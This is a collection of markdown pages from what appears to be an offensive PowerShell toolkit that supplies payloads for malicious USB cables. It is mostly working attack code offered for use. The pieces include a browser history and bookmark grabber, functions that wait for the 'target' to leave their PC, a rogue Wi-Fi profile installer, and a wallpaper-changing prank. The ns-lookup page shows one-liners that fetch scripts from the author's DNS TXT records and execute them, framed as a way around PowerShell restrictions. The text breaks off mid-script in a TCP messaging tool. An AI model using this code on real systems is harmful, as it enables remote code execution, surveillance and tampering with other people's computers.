| ``` 73 | 74 |

(back to top)

75 | 76 | 77 | ## Examples 78 | 79 | Listed below are payloads that have used one of these functions: 80 | 81 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 82 | 83 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 84 | 85 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 86 | 87 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 88 | 89 |

(back to top)

90 | 91 | 92 | ## Contact 93 | 94 |

📱 My Socials 📱

95 |
96 | 97 | 98 | 104 | 110 | 116 | 122 | 123 |
99 | 100 | C# 101 | 102 |
YouTube 103 | 		105 | 106 | Python 107 | 108 |
Twitter 109 | 		111 | 112 | Golang 113 | 114 |
Instagram 115 | 		117 | 118 | Jsonnet 119 | 120 |
Discord 121 |
124 |
125 | 126 | 127 | 128 |

(back to top)

129 | 130 | 131 | ## Acknowledgments 132 | 133 | * [Hak5](https://hak5.org/) 134 | * [UberGuidoZ](https://github.com/UberGuidoZ) 135 | 136 | *** 137 | 138 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 139 | 140 |

(back to top)

141 | -------------------------------------------------------------------------------- /Functions/B64.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Syntax
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Base64 Encoding/Decoding 16 | 17 |

18 | 19 | Golang 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function Encodes AND Decodes a File OR String 27 | 28 | ## The Function 29 | 30 | ### [B64] 31 | 32 | This funtion takes 1 parameter with 4 versions: 33 | 34 | [encFile] - encode file 35 | 36 | [encString] - encode string 37 | 38 | [decFile] - decode file 39 | 40 | [decString] - decode string 41 | 42 | *** 43 | 44 | ## [SYNTAX] 45 | 46 | ### Encode a File 47 | 48 | B64 -encFile "C:\Users\User\Desktop\example.txt" 49 | 50 | ### Decode a File 51 | 52 | B64 -decFile "C:\Users\User\Desktop\example.txt" 53 | 54 | WARNING! When working with strings you have to wrap it in SINGLE QUOTES! 55 | 56 | ### Encode a String 57 | 58 | B64 -encString 'start notepad' 59 | 60 | ### Decode a String 61 | 62 | B64 -decString 'cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=' 63 | 64 | ### Copy out-put directly to clipboard with the following syntax: 65 | 66 | COMMAND | clip 67 | 68 | *** 69 | 70 | ``` 71 | function B64 { 72 | [CmdletBinding(DefaultParameterSetName="encFile")] 73 | param( 74 | [Parameter(Position=0, ParameterSetName="encFile")] 75 | [Alias("ef")] 76 | [string]$encFile, 77 | 78 | [Parameter(Position=0, ParameterSetName="encString")] 79 | [Alias("es")] 80 | [string]$encString, 81 | 82 | [Parameter(Position=0, ParameterSetName="decFile")] 83 | [Alias("df")] 84 | [string]$decFile, 85 | 86 | [Parameter(Position=0, ParameterSetName="decString")] 87 | [Alias("ds")] 88 | [string]$decString 89 | 90 | ) 91 | 92 | if ($psCmdlet.ParameterSetName -eq "encFile") { 93 | $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((Get-Content -Path $encFile -Raw -Encoding UTF8))) 94 | return $encoded 95 | } 96 | 97 | elseif ($psCmdlet.ParameterSetName -eq "encString") { 98 | $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($encString)) 99 | return $encoded 100 | } 101 | 102 | elseif ($psCmdlet.ParameterSetName -eq "decFile") { 103 | $data = Get-Content $decFile 104 | $decoded = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($data)) 105 | return $decoded 106 | } 107 | 108 | elseif ($psCmdlet.ParameterSetName -eq "decString") { 109 | $decoded = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($decString)) 110 | return $decoded 111 | } 112 | } 113 | ``` 114 | 115 | 116 | 117 | 118 |

(back to top)

119 | 120 | 121 |

(back to top)

122 | 123 | 124 | ## Contact 125 | 126 |

📱 My Socials 📱

127 |
128 | 129 | 130 | 136 | 142 | 148 | 154 | 155 |
131 | 132 | C# 133 | 134 |
YouTube 135 | 		137 | 138 | Python 139 | 140 |
Twitter 141 | 		143 | 144 | Golang 145 | 146 |
Instagram 147 | 		149 | 150 | Jsonnet 151 | 152 |
Discord 153 |
156 |
157 | 158 | 159 | 160 |

(back to top)

161 | 162 | 163 | ## Acknowledgments 164 | 165 | * [Hak5](https://hak5.org/) 166 | * [UberGuidoZ](https://github.com/UberGuidoZ) 167 | 168 | *** 169 | 170 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 171 | 172 |

(back to top)

173 | -------------------------------------------------------------------------------- /Functions/B64-img.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. Syntax
    3. 9 |
  3. The Functions
    4. 10 |
  4. Examples
    5. 11 |
  5. Contact
    6. 12 |
  6. Acknowledgments
    7. 13 |
14 |
15 | 16 | # Base64 Image Converter 17 | 18 |

19 | 20 | Golang 21 | 22 |
YouTube Tutorial 23 |

24 | 25 | ## Description 26 | 27 | These two functions can be used to convert an image to and from base64 format 28 | 29 | ## [SYNTAX] 30 | 31 | ### Encode an Image 32 | ``` 33 | img-b64 -img "C:\Users\user\Desktop\image.jpg" -location desk 34 | ``` 35 | ### Decode a File 36 | ``` 37 | b64-img -file "C:\Users\user\Desktop\image.jpg" -location desk 38 | ``` 39 | ## The Functions 40 | 41 | ### [img-b64] 42 | 43 | This function will convert your image to base64 format 44 | 45 | Use the image tag to provide the path of the image you are trying to convert 46 | 47 | Using the Location parameter will determine if the file containing the base64 code is saved to the desktop or temp folder 48 | 49 | If no location is designated it will save it to the desktop by default 50 | 51 | ``` 52 | function img-b64 { 53 | [CmdletBinding()] 54 | param ( 55 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 56 | [string]$img, 57 | 58 | [Parameter (Mandatory = $False)] 59 | [ValidateSet('desk', 'temp')] 60 | [string]$location 61 | ) 62 | 63 | if (!$location) {$location = "desk"} 64 | 65 | $loc = switch ( $location ) 66 | { 67 | "desk" { "$Env:USERPROFILE\Desktop" 68 | } 69 | "temp" { "$env:TMP" 70 | } 71 | } 72 | 73 | [Convert]::ToBase64String((Get-Content -Path $img -Encoding Byte)) >> "$loc\encImage.txt" 74 | } 75 | ``` 76 | 77 | ### [b64-img] 78 | 79 | This function will convert your base64 encoded file back into an image 80 | 81 | Use the file tag to provide the path of the file you are trying to convert 82 | 83 | Using the Location parameter will determine if the file containing the base64 code is saved to the desktop or temp folder 84 | 85 | If no location is designated it will save it to the desktop by default 86 | 87 | ``` 88 | function b64-img { 89 | [CmdletBinding()] 90 | param ( 91 | [Parameter (Mandatory = $True)] 92 | [string]$file, 93 | 94 | [Parameter (Mandatory = $False)] 95 | [ValidateSet('desk', 'temp')] 96 | [string]$location 97 | ) 98 | 99 | if (!$location) {$location = "desk"} 100 | 101 | $loc = switch ( $location ) 102 | { 103 | "desk" { "$Env:USERPROFILE\Desktop" 104 | } 105 | "temp" { "$env:TMP" 106 | } 107 | } 108 | 109 | Add-Type -AssemblyName System.Drawing 110 | $Base64 = Get-Content -Raw -Path $file 111 | $Image = [Drawing.Bitmap]::FromStream([IO.MemoryStream][Convert]::FromBase64String($Base64)) 112 | $Image.Save("$loc\decImage.jpg") 113 | } 114 | ``` 115 | 116 |

(back to top)

117 | 118 | 119 | ## Examples 120 | 121 | Listed below are payloads that have used one of these functions: 122 | 123 |

(back to top)

124 | 125 | 126 | ## Contact 127 | 128 |

📱 My Socials 📱

129 |
130 | 131 | 132 | 138 | 144 | 150 | 156 | 157 |
133 | 134 | C# 135 | 136 |
YouTube 137 | 		139 | 140 | Python 141 | 142 |
Twitter 143 | 		145 | 146 | Golang 147 | 148 |
Instagram 149 | 		151 | 152 | Jsonnet 153 | 154 |
Discord 155 |
158 |
159 | 160 | 161 | 162 |

(back to top)

163 | 164 | 165 | ## Acknowledgments 166 | 167 | * [Hak5](https://hak5.org/) 168 | * [UberGuidoZ](https://github.com/UberGuidoZ) 169 | 170 | *** 171 | 172 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 173 | 174 |

(back to top)

175 | -------------------------------------------------------------------------------- /Functions/Get-BrowserData.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Get-BrowserData 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently) 27 | 28 | ## The Function 29 | 30 | ### [Get-BrowserData] 31 | 32 | In this function we will pass the browser name and data type (history/bookmarks) as parameter to retrieve the intended data 33 | 34 | ``` 35 | function Get-BrowserData { 36 | 37 | [CmdletBinding()] 38 | param ( 39 | [Parameter (Position=1,Mandatory = $True)] 40 | [string]$Browser, 41 | [Parameter (Position=1,Mandatory = $True)] 42 | [string]$DataType 43 | ) 44 | 45 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 46 | 47 | if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"} 48 | elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"} 49 | elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"} 50 | elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"} 51 | elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"} 52 | 53 | 54 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 55 | $Value | ForEach-Object { 56 | $Key = $_ 57 | if ($Key -match $Search){ 58 | New-Object -TypeName PSObject -Property @{ 59 | User = $env:UserName 60 | Browser = $Browser 61 | DataType = $DataType 62 | Data = $_ 63 | } 64 | } 65 | } 66 | } 67 | ``` 68 | SYNTAX: 69 | 70 | ``` 71 | Get-BrowserData -Browser "edge" -DataType "history" 72 | 73 | Get-BrowserData -Browser "edge" -DataType "bookmarks" 74 | 75 | Get-BrowserData -Browser "chrome" -DataType "history" 76 | 77 | Get-BrowserData -Browser "chrome" -DataType "bookmarks" 78 | 79 | Get-BrowserData -Browser "firefox" -DataType "history" 80 | ``` 81 | 82 |

(back to top)

83 | 84 | 85 | ## Examples 86 | 87 | Listed below are payloads that have used one of these functions: 88 | 89 | [Adv-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 90 | 91 | 92 | 93 | 94 |

(back to top)

95 | 96 | 97 | ## Contact 98 | 99 |

📱 My Socials 📱

100 |
101 | 102 | 103 | 109 | 115 | 121 | 127 | 128 |
104 | 105 | C# 106 | 107 |
YouTube 108 | 		110 | 111 | Python 112 | 113 |
Twitter 114 | 		116 | 117 | Golang 118 | 119 |
Instagram 120 | 		122 | 123 | Jsonnet 124 | 125 |
Discord 126 |
129 |
130 | 131 | 132 | 133 |

(back to top)

134 | 135 | 136 | ## Acknowledgments 137 | 138 | * [Hak5](https://hak5.org/) 139 | * [UberGuidoZ](https://github.com/UberGuidoZ) 140 | 141 | *** 142 | 143 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 144 | 145 |

(back to top)

146 | -------------------------------------------------------------------------------- /Functions/Detect-Mouse-Movement.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Functions
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Detect-Mouse-Movement 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | Detecting the mouse movement of a target could be helpful in 2 different situations. 27 | Finding out if they just came back to their PC 28 | or finding out if they stepped away from their PC. These functions will pause your script 29 | Until one of these conditions are met. 30 | 31 | ## The Functions 32 | 33 | ### [Target-Comes] 34 | In this first function the position of the cursor will be checked every 3 seconds 35 | 36 | If the position of the cursor has not changed the capslock button will be pressed every 3 seconds as well 37 | 38 | This is to stop the screen from sleeping and use the capslock light as an indicator the function is still waiting 39 | 40 | When the position of the cursor is different the function will break out of the loop and resume the script 41 | 42 | This is helpful if you are wanting to run a script once they return to their computer 43 | 44 | ```powershell 45 | function Target-Comes { 46 | Add-Type -AssemblyName System.Windows.Forms 47 | $originalPOS = [System.Windows.Forms.Cursor]::Position.X 48 | $o=New-Object -ComObject WScript.Shell 49 | 50 | while (1) { 51 | $pauseTime = 3 52 | if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ 53 | break 54 | } 55 | else { 56 | $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime 57 | } 58 | } 59 | } 60 | ``` 61 | 62 | ### [Target-Leaves] 63 | In the second function the position of the cursor will be checked 64 | 65 | Then the script will sleep for the number of seconds defined by the $PauseTime variable 66 | 67 | If the cursor is in the same position it will break out of the function and continue the script 68 | 69 | This is helpful if you are trying to determine if the target is away to run a script while they are gone 70 | 71 |

(back to top)

72 | 73 | ```powershell 74 | function Target-Leaves { 75 | [CmdletBinding()] 76 | param ( 77 | [Parameter (Position=0, Mandatory = $True)] 78 | [Int]$Seconds 79 | ) 80 | Add-Type -AssemblyName System.Windows.Forms 81 | 82 | while (1) { 83 | $originalPOS = [System.Windows.Forms.Cursor]::Position.X 84 | Start-Sleep -Seconds $Seconds 85 | if ([Windows.Forms.Cursor]::Position.X -eq $originalPOS){ 86 | break 87 | } 88 | else { 89 | Start-Sleep -Seconds 1 90 | } 91 | } 92 | } 93 | ``` 94 |

(back to top)

95 | 96 | 97 | ## Examples 98 | 99 | Listed below are payloads that have used one of these functions: 100 | 101 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 102 | 103 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 104 | 105 | 106 |

(back to top)

107 | 108 | 109 | ## Contact 110 | 111 |

📱 My Socials 📱

112 |
113 | 114 | 115 | 121 | 127 | 133 | 139 | 140 |
116 | 117 | C# 118 | 119 |
YouTube 120 | 		122 | 123 | Python 124 | 125 |
Twitter 126 | 		128 | 129 | Golang 130 | 131 |
Instagram 132 | 		134 | 135 | Jsonnet 136 | 137 |
Discord 138 |
141 |
142 | 143 | 144 | 145 |

(back to top)

146 | 147 | 148 | ## Acknowledgments 149 | 150 | * [Hak5](https://hak5.org/) 151 | * [UberGuidoZ](https://github.com/UberGuidoZ) 152 | 153 | *** 154 | 155 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 156 | 157 |

(back to top)

158 | -------------------------------------------------------------------------------- /Functions/ns-lookup.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Commands
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # NS-Lookup 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This concept was introduced to me VIA my friend Alh4zr3d on [twitter](https://twitter.com/Alh4zr3d/status/1566489367232651264?s=20&t=JXNaXH1m76yL31VdSzlyNg) 27 | 28 | This abuses the ability to pull down dns txt records from a website and execute the output 29 | 30 | This is especially helpful on systems using powershell constrained language and blocking Invoke-WebRequest or Invoke-Expression 31 | 32 | ## Commands 33 | 34 | The following commands will be referencing the DNS TXT Records shown in the below image 35 | 36 | Python 37 | 38 | ### [Single TXT Record Execution] 39 | 40 | This nslookup example is how I was introduced to this concept originally. 41 | 42 | It is used to pull down a single TXT Record and execute it 43 | 44 | `example` is referencing one of the DNS TXT Records in the image above. 45 | 46 | Replace it with the name of your TXT Record and replace the website URL with your own 47 | 48 | This will execute a simple echo command to show it works 49 | 50 | ``` 51 | powershell . (nslookup -q=txt example.iamjakoby.com)[-1] 52 | ``` 53 | 54 | More complex payloads are of course possible. 55 | 56 | Running the following example below will make you automatically subscribe to my youtube channel (you should try it) 57 | 58 | ``` 59 | powershell . (nslookup -q=txt sub.iamjakoby.com)[-1] 60 | ``` 61 | 62 | ### Take NOTE 63 | 64 | The previous examples will only work when executed in a powershell window. 65 | 66 | If it is your intention to use them in the Run Box they have to be modified as follows: 67 | 68 | ``` 69 | powershell "powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]" 70 | ``` 71 | 72 | ### [Multiple TXT Record Execution] 73 | 74 | The issue with pulling down a single TXT Record is they have a character limit of 255 75 | 76 | So in order to execute longer scripts you have to pull down multiple records and combine them 77 | 78 | The following modified verion I wrote will do just that 79 | 80 | `1..3` refers to DNS TXT Records 1, 2, and 3 in the image above. 81 | 82 | This will pull them down in that order and combine then execute them 83 | 84 | ``` 85 | 1..3|%{$p+=Resolve-DnsName "$_.iamjakoby.com." -Ty TXT |% S*s};& ([scriptblock]::Create($p)) 86 | ``` 87 | 88 | Like this first example however there needs to be a modification to use it in the Run Box 89 | 90 | The `" "` need to escaped with a `\` for it to function as intended 91 | 92 | ``` 93 | powershell 1..3|%{$p+=Resolve-DnsName \"$_.iamjakoby.com.\" -Ty TXT -EA 0|% S*s};& ([scriptblock]::Create($p)) 94 | ``` 95 | 96 |

(back to top)

97 | 98 | 99 | ## Examples 100 | 101 | Listed below are payloads that can use one of these commands: 102 | 103 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 104 | 105 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 106 | 107 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 108 | 109 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 110 | 111 |

(back to top)

112 | 113 | 114 | ## Contact 115 | 116 |

📱 My Socials 📱

117 |
118 | 119 | 120 | 126 | 132 | 138 | 144 | 145 |
121 | 122 | C# 123 | 124 |
YouTube 125 | 		127 | 128 | Python 129 | 130 |
Twitter 131 | 		133 | 134 | Golang 135 | 136 |
Instagram 137 | 		139 | 140 | Jsonnet 141 | 142 |
Discord 143 |
146 |
147 | 148 | 149 | 150 |

(back to top)

151 | 152 | 153 | ## Acknowledgments 154 | 155 | * [Hak5](https://hak5.org/) 156 | 157 | *** 158 | 159 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 160 | 161 |

(back to top)

162 | -------------------------------------------------------------------------------- /Functions/Add-Network.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Add-NetWork 16 | 17 |

18 | 19 | C# 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function will add a network profile to your targets PC 27 | 28 | ## The Function 29 | 30 | ### [Add-NetWork] 31 | 32 | This function will accept 3 parameters, 1 is mandatory 33 | 34 | You always have to provide the $SSID to give your network a name 35 | 36 | The $Security parameter is defined automatically when providing a password or not 37 | 38 | This will tell the function whether or not you need a wifi password for your network 39 | 40 | If a wifi password is deemed necessary you provide it using the $PW variable 41 | 42 | Set-up a new network profile on your targets PC using the following syntax: 43 | 44 | ``` 45 | For a network profile using a Password use: 46 | 47 | Add-NetWork -SSID wifi-name -PW wifi-password 48 | 49 | For a network profile NOT using a Password use: 50 | 51 | Add-NetWork -SSID wifi-name 52 | 53 | ``` 54 | 55 | 56 | ``` 57 | function Add-NetWork { 58 | 59 | [CmdletBinding()] 60 | param ( 61 | [Parameter (Mandatory = $True)] 62 | [string]$SSID, 63 | 64 | [Parameter (Mandatory = $False)] 65 | [Alias("s")] 66 | [string]$Security, 67 | 68 | [Parameter (Mandatory = $False)] 69 | [string]$PW 70 | 71 | ) 72 | 73 | if (!$PW) {$Security = "f"} 74 | if ($PW) {$Security = "t"} 75 | 76 | # ------------------------------------------------------------------------------------------------- 77 | 78 | $sec = switch ( $Security ) 79 | { 80 | "t" { 81 | " 82 | 83 | 84 | WPA2PSK 85 | AES 86 | false 87 | 88 | 89 | passPhrase 90 | false 91 | $PW 92 | 93 | 94 | " 95 | } 96 | "f" { 97 | 98 | " 99 | 100 | 101 | open 102 | none 103 | false 104 | 105 | 106 | " 107 | 108 | } 109 | } 110 | 111 | # ------------------------------------------------------------------------------------------------- 112 | 113 | $profilefile="ACprofile.xml" 114 | $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'' 115 | $xmlfile=" 116 | 117 | $SSID 118 | 119 | 120 | $SSIDHEX 121 | $SSID 122 | 123 | 124 | ESS 125 | auto 126 | 127 | $sec 128 | 129 | 130 | " 131 | 132 | $XMLFILE > ($profilefile) 133 | netsh wlan add profile filename="$($profilefile)" 134 | } 135 | ``` 136 | 137 |

(back to top)

138 | 139 | 140 | ## Examples 141 | 142 | Listed below are payloads that have used one of these functions: 143 | 144 | [PineApple](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-PineApple) 145 | 146 | 147 |

(back to top)

148 | 149 | 150 | ## Contact 151 | 152 |

📱 My Socials 📱

153 |
154 | 155 | 156 | 162 | 168 | 174 | 180 | 181 |
157 | 158 | C# 159 | 160 |
YouTube 161 | 		163 | 164 | Python 165 | 166 |
Twitter 167 | 		169 | 170 | Golang 171 | 172 |
Instagram 173 | 		175 | 176 | Jsonnet 177 | 178 |
Discord 179 |
182 |
183 | 184 | 185 | 186 |

(back to top)

187 | 188 | 189 | ## Acknowledgments 190 | 191 | * [Hak5](https://hak5.org/) 192 | * [UberGuidoZ](https://github.com/UberGuidoZ) 193 | 194 | *** 195 | 196 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 197 | 198 |

(back to top)

199 | -------------------------------------------------------------------------------- /Functions/Set-WallPaper.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Set-WallPaper 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function will set the targets wallpaper to the provided image 27 | 28 | ## The Function 29 | 30 | ### [Set-WallPaper] 31 | 32 | Using the following syntax will set the targets desktop wallpaper to an image of your choosing: 33 | 34 | ``` 35 | Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center 36 | ``` 37 | 38 | ``` 39 | Function Set-WallPaper { 40 | 41 | <# 42 | 43 | .SYNOPSIS 44 | Applies a specified wallpaper to the current user's desktop 45 | 46 | .PARAMETER Image 47 | Provide the exact path to the image 48 | 49 | .PARAMETER Style 50 | Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span) 51 | 52 | .EXAMPLE 53 | Set-WallPaper -Image "C:\Wallpaper\Default.jpg" 54 | Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit 55 | 56 | #> 57 | 58 | 59 | param ( 60 | [parameter(Mandatory=$True)] 61 | # Provide path to image 62 | [string]$Image, 63 | # Provide wallpaper style that you would like applied 64 | [parameter(Mandatory=$False)] 65 | [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] 66 | [string]$Style 67 | ) 68 | 69 | $WallpaperStyle = Switch ($Style) { 70 | 71 | "Fill" {"10"} 72 | "Fit" {"6"} 73 | "Stretch" {"2"} 74 | "Tile" {"0"} 75 | "Center" {"0"} 76 | "Span" {"22"} 77 | 78 | } 79 | 80 | If($Style -eq "Tile") { 81 | 82 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force 83 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force 84 | 85 | } 86 | Else { 87 | 88 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force 89 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force 90 | 91 | } 92 | 93 | Add-Type -TypeDefinition @" 94 | using System; 95 | using System.Runtime.InteropServices; 96 | 97 | public class Params 98 | { 99 | [DllImport("User32.dll",CharSet=CharSet.Unicode)] 100 | public static extern int SystemParametersInfo (Int32 uAction, 101 | Int32 uParam, 102 | String lpvParam, 103 | Int32 fuWinIni); 104 | } 105 | "@ 106 | 107 | $SPI_SETDESKWALLPAPER = 0x0014 108 | $UpdateIniFile = 0x01 109 | $SendChangeEvent = 0x02 110 | 111 | $fWinIni = $UpdateIniFile -bor $SendChangeEvent 112 | 113 | $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni) 114 | } 115 | ``` 116 | 117 |

(back to top)

118 | 119 | 120 | ## Examples 121 | [//]: # (Examples of scripts that have used your function) 122 | Listed below are payloads that have used one of these functions: 123 | 124 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 125 | 126 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 127 | 128 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 129 | 130 | 131 |

(back to top)

132 | 133 | 134 | ## Contact 135 | 136 |

📱 My Socials 📱

137 |
138 | 139 | 140 | 146 | 152 | 158 | 164 | 165 |
141 | 142 | C# 143 | 144 |
YouTube 145 | 		147 | 148 | Python 149 | 150 |
Twitter 151 | 		153 | 154 | Golang 155 | 156 |
Instagram 157 | 		159 | 160 | Jsonnet 161 | 162 |
Discord 163 |
166 |
167 | 168 | 169 | 170 |

(back to top)

171 | 172 | 173 | ## Acknowledgments 174 | 175 | * [Hak5](https://hak5.org/) 176 | * [UberGuidoZ](https://github.com/UberGuidoZ) 177 | 178 | *** 179 | 180 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 181 | 182 |

(back to top)

183 | -------------------------------------------------------------------------------- /VideoNotes/sendTCP.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | function Send-TcpMessage { 3 | param( 4 | [Parameter(Mandatory = $true)] 5 | [string]$TargetIP, 6 | 7 | [Parameter(Mandatory = $true)] 8 | [int]$TargetPort, 9 | 10 | [Parameter(Mandatory = $true)] 11 | [string]$Message 12 | ) 13 | 14 | try { 15 | $IP = [System.Net.Dns]::GetHostAddresses($TargetIP)[0] 16 | $Address = [System.Net.IPAddress]::Parse($IP) 17 | $Socket = New-Object System.Net.Sockets.TCPClient($Address, $TargetPort) 18 | $Stream = $Socket.GetStream() 19 | $Writer = New-Object System.IO.StreamWriter($Stream) 20 | $Writer.WriteLine($Message) 21 | $Writer.Flush() 22 | $Stream.Close() 23 | $Socket.Close() 24 | 25 | Write-Output "✔️ Message sent to $TargetIP : $TargetPort." 26 | } catch { 27 | Write-Error "⚠️ Error in sending message: $($_.Exception.Message)" 28 | } 29 | } 30 | 31 | # Load necessary assembly for Windows Forms 32 | Add-Type -AssemblyName System.Windows.Forms 33 | 34 | # Create the main form with dark background 35 | $form = New-Object System.Windows.Forms.Form 36 | $form.Text = 'Chat 